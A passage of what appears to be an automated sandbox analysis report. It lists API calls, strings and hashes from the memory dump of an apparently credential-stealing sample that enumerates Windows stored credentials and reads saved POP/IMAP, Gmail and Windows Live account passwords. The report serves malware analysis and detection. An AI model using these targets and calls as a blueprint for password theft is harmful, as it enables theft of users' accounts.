                      • GetProcAddress.KERNEL32(?,CredDeleteA), ref: 00404619
                      • GetProcAddress.KERNEL32(?,CredEnumerateA), ref: 00404625
                      • GetProcAddress.KERNEL32(?,CredEnumerateW), ref: 00404631
                      Strings
                      Memory Dump Source
                      • Source File: 00000017.00000002.1786776659.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_23_2_400000_wab.jbxd
                      Similarity
                      • API ID: AddressProc$Library$FreeLoad
                      • String ID: CredDeleteA$CredEnumerateA$CredEnumerateW$CredFree$CredReadA$advapi32.dll
                      • API String ID: 2449869053-4258758744
                      APIs
                      • RegOpenKeyExA.ADVAPI32(0040FC19,Creds,00000000,00020019,0040FC19,00456E58,00000040,?,?,0040FC19,?,?,?,?), ref: 0040F82C
                      • memset.MSVCRT ref: 0040F84A
                      • RegOpenKeyExA.ADVAPI32(?,?,00000000,00020019,?), ref: 0040F877
                      • RegQueryValueExA.ADVAPI32(?,ps:password,00000000,?), ref: 0040F8A0
                      • WideCharToMultiByte.KERNEL32(00000000,00000000,?,?,00000000,000000FF,00000000,00000000), ref: 0040F919
                      • LocalFree.KERNEL32(?), ref: 0040F92C
                      • RegCloseKey.ADVAPI32(?), ref: 0040F937
                      • RegEnumKeyA.ADVAPI32(?,00000000,?,000000FF), ref: 0040F94E
                      • RegCloseKey.ADVAPI32(?), ref: 0040F95F
                      Strings
                      Memory Dump Source
                      • Source File: 00000017.00000002.1786776659.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_23_2_400000_wab.jbxd
                      Similarity
                      • API ID: CloseOpen$ByteCharEnumFreeLocalMultiQueryValueWidememset
                      • String ID: Creds$ps:password
                      • API String ID: 551151806-1872227768
                      APIs
                      • wcsstr.MSVCRT ref: 0040426A
                      • WideCharToMultiByte.KERNEL32(00000000,00000000,?,000000FF,?,0000007F,00000000,00000000), ref: 004042B1
                      • WideCharToMultiByte.KERNEL32(00000000,00000000,?,000000FF,?,0000007F,00000000,00000000), ref: 004042C5
                      • _mbscpy.MSVCRT ref: 004042D5
                      • _mbscpy.MSVCRT ref: 004042E8
                      • strchr.MSVCRT ref: 004042F6
                      • strlen.MSVCRT ref: 0040430A
                      • sprintf.MSVCRT ref: 0040432B
                      • strchr.MSVCRT ref: 0040433C
                      Strings
                      Memory Dump Source
                      • Source File: 00000017.00000002.1786776659.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_23_2_400000_wab.jbxd
                      Similarity
                      • API ID: ByteCharMultiWide_mbscpystrchr$sprintfstrlenwcsstr
                      • String ID: %s@gmail.com$www.google.com
                      • API String ID: 3866421160-4070641962
                      • Opcode ID: 29547c4834dfc2f3f2c875d949c5bc687f91e1fab8962d8e257cc58e07cba8ed
                      • Instruction ID: 1d125d0bf78842d5973e64574db62130ec83037e0b154f7c504db0db8660d96c
                      • Opcode Fuzzy Hash: 29547c4834dfc2f3f2c875d949c5bc687f91e1fab8962d8e257cc58e07cba8ed
                      • Instruction Fuzzy Hash: DA3186B290025DAFEB11DBA1DC81FDAB3BCEB45714F1405A7B718E3180DA38EF448A58
                      APIs
                      • _mbscpy.MSVCRT ref: 00409749
                      • _mbscpy.MSVCRT ref: 00409759
                        • Part of subcall function 0040930C: memset.MSVCRT ref: 00409331
                        • Part of subcall function 0040930C: GetPrivateProfileStringA.KERNEL32(0045A550,?,0044C52F,?,00001000,0045A448), ref: 00409355
                        • Part of subcall function 0040930C: WritePrivateProfileStringA.KERNEL32(0045A550,?,?,0045A448), ref: 0040936C
                      • EnumResourceNamesA.KERNEL32(?,00000004,Function_0000955A,00000000), ref: 0040978F
                      • EnumResourceNamesA.KERNEL32(?,00000005,Function_0000955A,00000000), ref: 00409799
                      • _mbscpy.MSVCRT ref: 004097A1
                      • memset.MSVCRT ref: 004097BD
                      • LoadStringA.USER32(?,00000000,?,00001000), ref: 004097D1
                        • Part of subcall function 0040937A: _itoa.MSVCRT ref: 0040939B
                      Strings
                      Memory Dump Source
                      • Source File: 00000017.00000002.1786776659.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_23_2_400000_wab.jbxd
                      Similarity
                      • API ID: String_mbscpy$EnumNamesPrivateProfileResourcememset$LoadWrite_itoa
                      • String ID: TranslatorName$TranslatorURL$general$strings
                      • API String ID: 1035899707-3647959541
                      • Opcode ID: 07fb82029a378e95c81cd618e89f57cfeb9c17a135c2b190ac6c60c85071189e
                      • Instruction ID: 9d87356d66cebc64c7ffc1a8588b7925a858c7ffbf95e02bf5fcf8d8eff5f455
                      • Opcode Fuzzy Hash: 07fb82029a378e95c81cd618e89f57cfeb9c17a135c2b190ac6c60c85071189e
                      • Instruction Fuzzy Hash: F711C87290016475F7312B569C46F9B3F5CDBCAB55F10007BBB08A71C3D6B89D408AAD
                      APIs
                      Strings
                      Memory Dump Source
                      • Source File: 00000017.00000002.1786776659.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_23_2_400000_wab.jbxd
                      Similarity
                      • API ID: _strcmpi_strnicmpmemsetsprintf$strlen
                      • String ID: imap://$imap://%s@%s$mailbox://$mailbox://%s@%s
                      • API String ID: 2360744853-2229823034
                      • Opcode ID: fa9f5f1c2ef6f652c20f964ce99d96b8fee6feb6c02ab87e42e45cad748783be
                      • Instruction ID: 1258fd73e7f0479363a75d8e9bd03f7624e4807d7768342ee5bbbb65847b95d7
                      • Opcode Fuzzy Hash: fa9f5f1c2ef6f652c20f964ce99d96b8fee6feb6c02ab87e42e45cad748783be
                      • Instruction Fuzzy Hash: 95418272604605AFE720DAA6CC81F96B3F8EB04314F14497BF95AE7281D738F9548B58
                      APIs
                      • strchr.MSVCRT ref: 004100E4
                      • _mbscpy.MSVCRT ref: 004100F2
                        • Part of subcall function 0040783C: strlen.MSVCRT ref: 0040784E
                        • Part of subcall function 0040783C: strlen.MSVCRT ref: 00407856
                        • Part of subcall function 0040783C: _memicmp.MSVCRT ref: 00407874
                      • _mbscpy.MSVCRT ref: 00410142
                      • _mbscat.MSVCRT ref: 0041014D
                      • memset.MSVCRT ref: 00410129
                        • Part of subcall function 0040715B: GetWindowsDirectoryA.KERNEL32(0045AA00,00000104,?,00410182,00000000,?,00000000,00000104,00000104), ref: 00407170
                        • Part of subcall function 0040715B: _mbscpy.MSVCRT ref: 00407180
                      • memset.MSVCRT ref: 00410171
                      • memcpy.MSVCRT ref: 0041018C
                      • _mbscat.MSVCRT ref: 00410197
                      Strings
                      Memory Dump Source
                      • Source File: 00000017.00000002.1786776659.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_23_2_400000_wab.jbxd
                      Similarity
                      • API ID: _mbscpy$_mbscatmemsetstrlen$DirectoryWindows_memicmpmemcpystrchr
                      • String ID: \systemroot
                      • API String ID: 912701516-1821301763
                      • Opcode ID: f8a886503ef803f3ee0bfd3d9e760fda2e58d4ed4af484f5670658ee78c777d3
                      • Instruction ID: fda7f57b1b0f7358cef9bf297f3eeb801234e423e358f1bd4862c9dba8460d26
                      • Opcode Fuzzy Hash: f8a886503ef803f3ee0bfd3d9e760fda2e58d4ed4af484f5670658ee78c777d3
                      • Instruction Fuzzy Hash: 3721AA7590C28479F724E2618C83FEA679CDB55704F50405FB2C9A51C1EAECF9C5862A
                      APIs
                      Strings
                      Memory Dump Source
                      • Source File: 00000017.00000002.1786776659.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_23_2_400000_wab.jbxd
                      Similarity
                      • API ID: memcpy$strlen
                      • String ID: -journal$-wal$immutable$nolock
                      • API String ID: 2619041689-3408036318
                      • Opcode ID: 4aa253e10d8a34062e03d838a13a14f4a10eae4ea059de94ba2ca72b62420cd1
                      • Instruction ID: 25f2131b2e7268d2841c48c11c9a86e68458d3caa4be6fdea11427aceae17f40
                      • Opcode Fuzzy Hash: 4aa253e10d8a34062e03d838a13a14f4a10eae4ea059de94ba2ca72b62420cd1
                      • Instruction Fuzzy Hash: 9FC1D1B1A04606EFDB14DFA5C841BDEFBB0BF45314F14815EE528A7381D778AA90CB98
                      APIs
                        • Part of subcall function 004045DB: LoadLibraryA.KERNEL32(advapi32.dll,?,0040F708,?,00000000), ref: 004045E8
                        • Part of subcall function 004045DB: GetProcAddress.KERNEL32(00000000,CredReadA), ref: 00404601
                        • Part of subcall function 004045DB: GetProcAddress.KERNEL32(?,CredFree), ref: 0040460D
                        • Part of subcall function 004045DB: GetProcAddress.KERNEL32(?,CredDeleteA), ref: 00404619
                        • Part of subcall function 004045DB: GetProcAddress.KERNEL32(?,CredEnumerateA), ref: 00404625
                        • Part of subcall function 004045DB: GetProcAddress.KERNEL32(?,CredEnumerateW), ref: 00404631
                      • wcslen.MSVCRT ref: 0040874A
                      • _wcsncoll.MSVCRT ref: 00408794
                      • memset.MSVCRT ref: 0040882A
                      • memcpy.MSVCRT ref: 00408849
                      • wcschr.MSVCRT ref: 0040889F
                      • LocalFree.KERNEL32(?,?,?,?,?,?,?), ref: 004088CB
                      Strings
                      Memory Dump Source
                      • Source File: 00000017.00000002.1786776659.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_23_2_400000_wab.jbxd
                      Similarity
                      • API ID: AddressProc$FreeLibraryLoadLocal_wcsncollmemcpymemsetwcschrwcslen
                      • String ID: J$Microsoft_WinInet
                      • API String ID: 2203907242-260894208
                      • Opcode ID: 123b9c113c62e2732d222d76ca296a8e2b2539d047cdc4c6dd048264b325ab7f
                      • Instruction ID: 28b95496509cbb6d8c3a882eeb8be19e6e579a4afcb86d24d1cb248b0f397b1b
                      • Opcode Fuzzy Hash: 123b9c113c62e2732d222d76ca296a8e2b2539d047cdc4c6dd048264b325ab7f
                      • Instruction Fuzzy Hash: 9E5127B16083469FD710EF65C981A5BB7E8FF89304F40492EF998D3251EB38E944CB5A
                      APIs
                      • UuidFromStringA.RPCRT4(220D5CD0-853A-11D0-84BC-00C04FD43F8F,00000001), ref: 00410902
                      • UuidFromStringA.RPCRT4(220D5CC1-853A-11D0-84BC-00C04FD43F8F,00000001), ref: 00410916
                      • UuidFromStringA.RPCRT4(417E2D75-84BD-11D0-84BB-00C04FD43F8F,?), ref: 00410923
                      • memcpy.MSVCRT ref: 00410961
                      Strings
                      • 220D5CC1-853A-11D0-84BC-00C04FD43F8F, xrefs: 00410911
                      • 220D5CD0-853A-11D0-84BC-00C04FD43F8F, xrefs: 004108FD
                      • 220D5CD1-853A-11D0-84BC-00C04FD43F8F, xrefs: 0041090A
                      • 417E2D75-84BD-11D0-84BB-00C04FD43F8F, xrefs: 0041091E
                      Memory Dump Source
                      • Source File: 00000017.00000002.1786776659.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_23_2_400000_wab.jbxd
                      Similarity
                      • API ID: FromStringUuid$memcpy
                      • String ID: 220D5CC1-853A-11D0-84BC-00C04FD43F8F$220D5CD0-853A-11D0-84BC-00C04FD43F8F$220D5CD1-853A-11D0-84BC-00C04FD43F8F$417E2D75-84BD-11D0-84BB-00C04FD43F8F
                      • API String ID: 2859077140-2022683286
                      • Opcode ID: abdaa11197fe0e36068712593a832dde72f9d49fceae32f26c9e946e83c56665
                      • Instruction ID: 9e6d0ab6f4d779539f8eb1da53a4fb6c135c1230b89e6f6df403d509513a9b08
                      • Opcode Fuzzy Hash: abdaa11197fe0e36068712593a832dde72f9d49fceae32f26c9e946e83c56665
                      • Instruction Fuzzy Hash: AD1151B391011DAAEF11EEA5DC80EEB37ACAB45350F040027F951E3251E6B4D9458BA5
                      APIs
                        • Part of subcall function 00406F81: GetFileAttributesA.KERNELBASE(?,00401EE6,?), ref: 00406F85
                      • _mbscpy.MSVCRT ref: 00409686
                      • _mbscpy.MSVCRT ref: 00409696
                      • GetPrivateProfileIntA.KERNEL32(0045A550,rtl,00000000,0045A448), ref: 004096A7
                        • Part of subcall function 00409278: GetPrivateProfileStringA.KERNEL32(0045A550,?,0044C52F,0045A5A0,?,0045A448), ref: 00409293
                      Strings
                      Memory Dump Source
                      • Source File: 00000017.00000002.1786776659.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_23_2_400000_wab.jbxd
                      Similarity
                      • API ID: PrivateProfile_mbscpy$AttributesFileString
                      • String ID: TranslatorName$TranslatorURL$charset$general$rtl
                      • API String ID: 888011440-2039793938
                      • Opcode ID: 0e79880e1a595b11c4c54fae987beab4c47f6ff888ef6c0570b87c08ce61dc62
                      • Instruction ID: 35163425d10a67bbe8c9c36fe52ba00322d2719519e04c12929343b9a05e3383
                      • Opcode Fuzzy Hash: 0e79880e1a595b11c4c54fae987beab4c47f6ff888ef6c0570b87c08ce61dc62
                      • Instruction Fuzzy Hash: 51F09621EC021636EA113A315C47F6E75148F91B16F1546BBBD057B2C3EA6C8D21819F
                      APIs
                      Strings
                      • unable to open database: %s, xrefs: 0042EBD6
                      • out of memory, xrefs: 0042EBEF
                      • attached databases must use the same text encoding as main database, xrefs: 0042EAE6
                      • too many attached databases - max %d, xrefs: 0042E951
                      • cannot ATTACH database within transaction, xrefs: 0042E966
                      • database is already attached, xrefs: 0042EA97
                      • database %s is already in use, xrefs: 0042E9CE
                      Memory Dump Source
                      • Source File: 00000017.00000002.1786776659.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_23_2_400000_wab.jbxd
                      Similarity
                      • API ID: memcpymemset
                      • String ID: attached databases must use the same text encoding as main database$cannot ATTACH database within transaction$database %s is already in use$database is already attached$out of memory$too many attached databases - max %d$unable to open database: %s
                      • API String ID: 1297977491-2001300268
                      • Opcode ID: 79cb3876c2fc92d661153f2d5ae8e07f357d02a67bcab47e18a9ae982f962df5
                      • Instruction ID: 706ac67067754653a22c48b2dfc2d31ecc94a00d4abf430cd75191e688397775
                      • Opcode Fuzzy Hash: 79cb3876c2fc92d661153f2d5ae8e07f357d02a67bcab47e18a9ae982f962df5
                      • Instruction Fuzzy Hash: E5A1BFB16083119FD720DF26E441B1BBBE0BF84314F54491FF8998B252D778E989CB5A
                      APIs
                        • Part of subcall function 00403138: GetPrivateProfileStringA.KERNEL32(00000000,?,0044C52F,?,?,?), ref: 0040315C
                      • strchr.MSVCRT ref: 0040327B
                      Strings
                      Memory Dump Source
                      • Source File: 00000017.00000002.1786776659.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_23_2_400000_wab.jbxd
                      Similarity
                      • API ID: PrivateProfileStringstrchr
                      • String ID: 1$LoginName$PopAccount$PopServer$RealName$ReturnAddress$SavePasswordText$UsesIMAP
                      • API String ID: 1348940319-1729847305
                      • Opcode ID: b5df54f4728cfba1fc6d3682f37c83209c501ebf9394a37894307d593f194734
                      • Instruction ID: 3c3f6fb7771655520bf9db4259302bbcc59fb1a7701990a2e81aa7d88bec6f27
                      • Opcode Fuzzy Hash: b5df54f4728cfba1fc6d3682f37c83209c501ebf9394a37894307d593f194734
                      • Instruction Fuzzy Hash: 6C31A07094024EBEEF119F60CC45FDABF6CAF14319F10806AB59C7A1D1C7B99B948B54
                      APIs
                      Strings
                      Memory Dump Source
                      • Source File: 00000017.00000002.1786776659.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_23_2_400000_wab.jbxd
                      Similarity
                      • API ID: memcpy
                      • String ID: &amp;$&deg;$&gt;$&lt;$&quot;$<br>
                      • API String ID: 3510742995-3273207271
                      • Opcode ID: f9ae4bccd643c252e3d2802759cb712313e1c03ba6bda263eb3b4f79a5d554f2
                      • Instruction ID: 550cffa583b2c54ba2aa88b33b5e976ebd7c1d4e5c49a3816a9e471e7c07ee5b
                      • Opcode Fuzzy Hash: f9ae4bccd643c252e3d2802759cb712313e1c03ba6bda263eb3b4f79a5d554f2
                      • Instruction Fuzzy Hash: D501D4B2FC86E428FA3006450C46FE74E4547BFB11F350017F78525AA5A09D0DC7816F
                      APIs
                        • Part of subcall function 004070AE: GetVersionExA.KERNEL32(0045A3B0,0000001A,00410DD9,00000104), ref: 004070C8
                      • memset.MSVCRT ref: 0040FA1E
                      • WideCharToMultiByte.KERNEL32(00000000,00000000,?,000000FF,?,000000FF,00000000,00000000,?,?,?), ref: 0040FA35
                      • _strnicmp.MSVCRT ref: 0040FA4F
                      • WideCharToMultiByte.KERNEL32(00000000,00000000,?,000000FF,?,000000FF,00000000,00000000,?,?,?,?,?,?), ref: 0040FA7B
                      • WideCharToMultiByte.KERNEL32(00000000,00000000,?,?,?,000000FF,00000000,00000000,?,?,?,?,?,?), ref: 0040FA9B
                      Strings
                      Memory Dump Source
                      • Source File: 00000017.00000002.1786776659.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_23_2_400000_wab.jbxd
                      Similarity
                      • API ID: ByteCharMultiWide$Version_strnicmpmemset
                      • String ID: WindowsLive:name=*$windowslive:name=
                      • API String ID: 945165440-3589380929
                      • Opcode ID: d76308cf3b0539381bda6f4980a48b5ab9a4ebba73adfb730004608c6550dc67
                      • Instruction ID: 67e4bc7d9cc92e77f49167b45697c8bd07ba2e516c4687fa62adfbc1007618b4
                      • Opcode Fuzzy Hash: d76308cf3b0539381bda6f4980a48b5ab9a4ebba73adfb730004608c6550dc67
                      • Instruction Fuzzy Hash: D1418BB1508345AFC720DF24D88496BB7ECEB85304F004A3EF99AA3691D738DD48CB66
                      APIs
                        • Part of subcall function 00410863: UuidFromStringA.RPCRT4(5e7e8100-9138-11d1-945a-00c04fc308ff,?), ref: 0041087A
                        • Part of subcall function 00410863: UuidFromStringA.RPCRT4(00000000-0000-0000-0000-000000000000,?), ref: 00410887
                        • Part of subcall function 00410863: memcpy.MSVCRT ref: 004108C3
                      • strchr.MSVCRT ref: 0040371F
                      • _mbscpy.MSVCRT ref: 00403748
                      • _mbscpy.MSVCRT ref: 00403758
                      • strlen.MSVCRT ref: 00403778
                      • sprintf.MSVCRT ref: 0040379C
                      • _mbscpy.MSVCRT ref: 004037B2
                      Strings
                      Memory Dump Source
                      • Source File: 00000017.00000002.1786776659.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_23_2_400000_wab.jbxd
                      Similarity
                      • API ID: _mbscpy$FromStringUuid$memcpysprintfstrchrstrlen
                      • String ID: %s@gmail.com
                      • API String ID: 500647785-4097000612
                      • Opcode ID: 74159e27bd978c3f9cb24cdd3adb322da0b0d12deb1a375656cb0fbfbc9e6cd0
                      • Instruction ID: 26c7b24e36a56a715c82424c63065c573d607dcbd7bcbeb2789f412f71db7656
                      • Opcode Fuzzy Hash: 74159e27bd978c3f9cb24cdd3adb322da0b0d12deb1a375656cb0fbfbc9e6cd0
                      • Instruction Fuzzy Hash: 2F21AEF290415C5AEB11DB95DCC5FDAB7FCEB54308F0405ABF108E3181EA78AB888B65
                      APIs
                      • memset.MSVCRT ref: 004094C8
                      • GetDlgCtrlID.USER32(?), ref: 004094D3
                      • GetWindowTextA.USER32(?,?,00001000), ref: 004094E6
                      • memset.MSVCRT ref: 0040950C
                      • GetClassNameA.USER32(?,?,000000FF), ref: 0040951F
                      • _strcmpi.MSVCRT ref: 00409531
                        • Part of subcall function 0040937A: _itoa.MSVCRT ref: 0040939B
                      Strings
                      Memory Dump Source
                      • Source File: 00000017.00000002.1786776659.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_23_2_400000_wab.jbxd
                      Similarity
                      • API ID: memset$ClassCtrlNameTextWindow_itoa_strcmpi
                      • String ID: sysdatetimepick32
                      • API String ID: 3411445237-4169760276
                      • Opcode ID: d298131e59c589d759801c5718a5716a1bfbc5a0205dba439accd7a9806c0ec0
                      • Instruction ID: 275a188ed2e8c4d5dd974f468a7d06fe6df33147f8fd952053c2ef98a917a35b
                      • Opcode Fuzzy Hash: d298131e59c589d759801c5718a5716a1bfbc5a0205dba439accd7a9806c0ec0
                      • Instruction Fuzzy Hash: 2D11E773C051297EEB129754DC81EEF7BACEF5A315F0400B6FA08E2151E674DE848A64
                      APIs
                      • SendMessageA.USER32(?,00001003,00000001,?), ref: 0040B3DC
                      • SendMessageA.USER32(?,00001003,00000000,?), ref: 0040B411
                      • LoadImageA.USER32(00000085,00000000,00000010,00000010,00001000), ref: 0040B446
                      • LoadImageA.USER32(00000086,00000000,00000010,00000010,00001000), ref: 0040B462
                      • GetSysColor.USER32(0000000F), ref: 0040B472
                      • DeleteObject.GDI32(?), ref: 0040B4A6
                      • DeleteObject.GDI32(00000000), ref: 0040B4A9
                      • SendMessageA.USER32(00000000,00001208,00000000,?), ref: 0040B4C7
                      Memory Dump Source
                      • Source File: 00000017.00000002.1786776659.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_23_2_400000_wab.jbxd
                      Similarity
                      • API ID: MessageSend$DeleteImageLoadObject$Color
                      • String ID:
                      • API String ID: 3642520215-0
                      • Opcode ID: 3f6f34f20c78ecfe39199dd04a8c69320b349886d0faf46357142e58b0488c36
                      • Instruction ID: 78997c319ae04cc2c464f68e1b112159c67c6e7e05dd954700a2b997fe6bb290
                      • Opcode Fuzzy Hash: 3f6f34f20c78ecfe39199dd04a8c69320b349886d0faf46357142e58b0488c36
                      • Instruction Fuzzy Hash: 5A317275680308BFFA715B70DC87FD6B695EB48B00F104828F3857A1E1CAF279909B68
                      APIs
                      • GetSystemMetrics.USER32(00000011), ref: 004072E7
                      • GetSystemMetrics.USER32(00000010), ref: 004072ED
                      • GetDC.USER32(00000000), ref: 004072FB
                      • GetDeviceCaps.GDI32(00000000,00000008), ref: 0040730D
                      • GetDeviceCaps.GDI32(004012E4,0000000A), ref: 00407316
                      • ReleaseDC.USER32(00000000,004012E4), ref: 0040731F
                      • GetWindowRect.USER32(004012E4,?), ref: 0040732C
                      • MoveWindow.USER32(004012E4,?,?,?,?,00000001,?,?,?,?,?,?,004012E4,?), ref: 00407371
                      Memory Dump Source
                      • Source File: 00000017.00000002.1786776659.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_23_2_400000_wab.jbxd
                      Similarity
                      • API ID: CapsDeviceMetricsSystemWindow$MoveRectRelease
                      • String ID:
                      • API String ID: 1999381814-0
                      • Opcode ID: 5011a2be71f5844cc92965472a983066776558f1b2f7244de85e539227eebf35
                      • Instruction ID: 22bb5f5faf33eb927601db2df5736372c6ae1ca5e65390263d5238b88a5d6584
                      • Opcode Fuzzy Hash: 5011a2be71f5844cc92965472a983066776558f1b2f7244de85e539227eebf35
                      • Instruction Fuzzy Hash: C611A536E00219AFDF008FF9DC49BAE7FB9EB44311F040175EE05E3290DA70A8418A90
                      APIs
                      Strings
                      Memory Dump Source
                      • Source File: 00000017.00000002.1786776659.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_23_2_400000_wab.jbxd
                      Similarity
                      • API ID: memcpymemset
                      • String ID: abort due to ROLLBACK$out of memory$statement aborts at %d: [%s] %s$string or blob too big$unknown error
                      • API String ID: 1297977491-3883738016
                      • Opcode ID: 5be73647a144ebf5748a75f3c436a574a9202e5f864b3081d31fa7a4dfb760c6
                      • Instruction ID: e5ed660087d787d4baabea17299805ba1702756b87ddf288a6169370bd8562d9
                      • Opcode Fuzzy Hash: 5be73647a144ebf5748a75f3c436a574a9202e5f864b3081d31fa7a4dfb760c6
                      • Instruction Fuzzy Hash: FA128D75A00629DFCB14DF68E480AADBBB1BF08314F65409BE945AB341D738F981CF99
                      APIs
                        • Part of subcall function 00449550: memset.MSVCRT ref: 0044955B
                        • Part of subcall function 00449550: memset.MSVCRT ref: 0044956B
                        • Part of subcall function 00449550: memcpy.MSVCRT ref: 004495C8
                        • Part of subcall function 00449550: memcpy.MSVCRT ref: 00449616
                      • memcpy.MSVCRT ref: 0044972E
                      • memcpy.MSVCRT ref: 0044977B
                      • memcpy.MSVCRT ref: 004497F6
                        • Part of subcall function 00449260: memcpy.MSVCRT ref: 00449291
                        • Part of subcall function 00449260: memcpy.MSVCRT ref: 004492DD
                      • memcpy.MSVCRT ref: 00449846
                      • memcpy.MSVCRT ref: 00449887
                      • memcpy.MSVCRT ref: 004498B8
                      Strings
                      Memory Dump Source
                      • Source File: 00000017.00000002.1786776659.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_23_2_400000_wab.jbxd
                      Similarity
                      • API ID: memcpy$memset
                      • String ID: gj
                      • API String ID: 438689982-4203073231
                      • Opcode ID: 832627842ba8dc90b88f641ae0f393e23f8c73a82c86ca3b23e3764f0db7e7b3
                      • Instruction ID: 4698d9130898d2a28bd34890c38a7d1df91d0c58a43dc6add7b2b2ec2d892026
                      • Opcode Fuzzy Hash: 832627842ba8dc90b88f641ae0f393e23f8c73a82c86ca3b23e3764f0db7e7b3
                      • Instruction Fuzzy Hash: AB71C9B35083448BE310EF65D88069FB7E9BFD5344F050A2EE98997301E635DE09C796
                      APIs
                      Strings
                      Memory Dump Source
                      • Source File: 00000017.00000002.1786776659.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_23_2_400000_wab.jbxd
                      Similarity
                      • API ID: __aulldvrm$__aullrem
                      • String ID: -$-x0$0123456789ABCDEF0123456789abcdef
                      • API String ID: 643879872-978417875
                      • Opcode ID: b74aa8b09285f319ac94010cbb77161464d88d468cab547f1369814aecdf9254
                      • Instruction ID: 9a4dcd4671c0eaaf570ced65c0a394ff57d12b60ca94b612a12fd923c93321e5
                      • Opcode Fuzzy Hash: b74aa8b09285f319ac94010cbb77161464d88d468cab547f1369814aecdf9254
                      • Instruction Fuzzy Hash: 09618C315083819FD7218F2886447ABBBE1AFC6704F18495FF8C4D7352D3B8C9998B4A
                      APIs
                      • GetDlgItem.USER32(?,000003E9), ref: 00405827
                      • SendMessageA.USER32(00000000,00001009,00000000,00000000), ref: 00405840
                      • SendMessageA.USER32(?,00001036,00000000,00000026), ref: 0040584D
                      • SendMessageA.USER32(?,0000101C,00000000,00000000), ref: 00405859
                      • memset.MSVCRT ref: 004058C3
                      • SendMessageA.USER32(?,00001019,?,?), ref: 004058F4
                      • SetFocus.USER32(?), ref: 00405976
                      Memory Dump Source
                      • Source File: 00000017.00000002.1786776659.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_23_2_400000_wab.jbxd
                      Similarity
                      • API ID: MessageSend$FocusItemmemset
                      • String ID:
                      • API String ID: 4281309102-0
                      • Opcode ID: 1e065b1851f46eedf46acd576a64098092c66e4320400e0dd2798a55d04b3de4
                      • Instruction ID: c72ca3e99ea405196032a5824f130882485a5617ada8e3d881518c79e7018221
                      • Opcode Fuzzy Hash: 1e065b1851f46eedf46acd576a64098092c66e4320400e0dd2798a55d04b3de4
                      • Instruction Fuzzy Hash: 4241F8B5900209AFDB20DF94DC81EAEBBB9EF04358F1440AAE908B7291D7759E50DF94
                      APIs
                        • Part of subcall function 00406D33: strlen.MSVCRT ref: 00406D40
                        • Part of subcall function 00406D33: WriteFile.KERNEL32(?,?,00000000,?,00000000,?,?,0040AB7D,?,<item>), ref: 00406D4D
                      • _mbscat.MSVCRT ref: 0040A8FF
                      • sprintf.MSVCRT ref: 0040A921
                      Strings
                      Memory Dump Source
                      • Source File: 00000017.00000002.1786776659.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_23_2_400000_wab.jbxd
                      Similarity
                      • API ID: FileWrite_mbscatsprintfstrlen
                      • String ID: &nbsp;$<td bgcolor=#%s nowrap>%s$<td bgcolor=#%s>%s$<tr>
                      • API String ID: 1631269929-4153097237
                      • Opcode ID: 1edff87013eeafc9988ac017b7f9a6f14c9cca9b6a50fb5f6e60c21e7938a174
                      • Instruction ID: 568bce87a3ef0860ab630a318aded4c5cbf938598f8cce33e7c60ad495c5b4cb
                      • Opcode Fuzzy Hash: 1edff87013eeafc9988ac017b7f9a6f14c9cca9b6a50fb5f6e60c21e7938a174
